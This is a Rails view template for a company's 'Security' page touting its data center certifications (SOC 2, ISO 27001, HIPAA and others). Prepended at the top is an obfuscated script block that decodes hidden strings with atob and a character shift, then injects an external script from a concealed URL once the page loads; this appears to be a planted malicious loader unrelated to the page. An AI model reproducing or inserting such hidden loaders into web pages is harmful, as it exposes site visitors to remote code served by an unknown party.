<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "security.jpg", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <h1 class="heading-decorated heading-decorated_center">Security</h1>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<!-- Intro-->
<section class="section-md bg-default text-center">
  <div class="container">
    <div class="row row-50 justify-content-lg-center">
      <div class="col-lg-10 col-xl-8">
        <h6>
          At Empire Discovery, we understand the importance of privacy and security, which is why we have strict policies in place. Our Data Center is housed in a state of the art center located in New York, and complies with the guidelines set forth in the following industry certifications:
        </h6>

        <div class="row">
          <div class="col-12 col-md-6">
            <ul class="list-marked no-bullet mt-5 text-left">
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  24/7 x 365 On Site Physical Support and Security
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  SSAE 16 Type II Certified Data Center
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  Complete Data Backup and Disaster Recovery
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  Security Audits and Certifications
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  Penetration Testing and Audit Logs
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  Multiple Layers of Physical Security and Electronically Controlled Access
                </h6>
              </li>
            </ul>
          </div>
          <div class="col-12 col-md-6">
            <ul class="list-marked no-bullet mt-5 text-left">
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  State of the Art Fire Suppression
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  Co-Location Site
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  ISO 27001
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  HIPAA compliant
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  SOC 2 Mapping
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  SOC 2
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  SOC 3
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  PCI-DSS
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                  CCTV Surveillance with Digital Storage
                </h6>
              </li>
              <li>
                <h6>
                  <i class="icon icon-xxs fa fa-check mr-2"></i>
                   NIST 800-53
                </h6>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<section>
  <section class="section">
    <div class="parallax-content">
      <div class="section-md pt-3 pb-0 text-center">
        <div class="container">
          <h3 class="heading-decorated">Certifications</h3>

          <div class="d-flex w-100 flex-row justify-content-center flex-wrap mt-4">
            <%= image_tag 'certifications/certification_1.jpg', class: 'certificaiton' %>
            <%= image_tag 'certifications/certification_2.jpg', class: 'certificaiton' %>
            <%= image_tag 'certifications/certification_3.png', class: 'certificaiton' %>
            <%= image_tag 'certifications/certification_4.jpg', class: 'certificaiton' %>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<%= render partial: 'shared/contact_form' %>
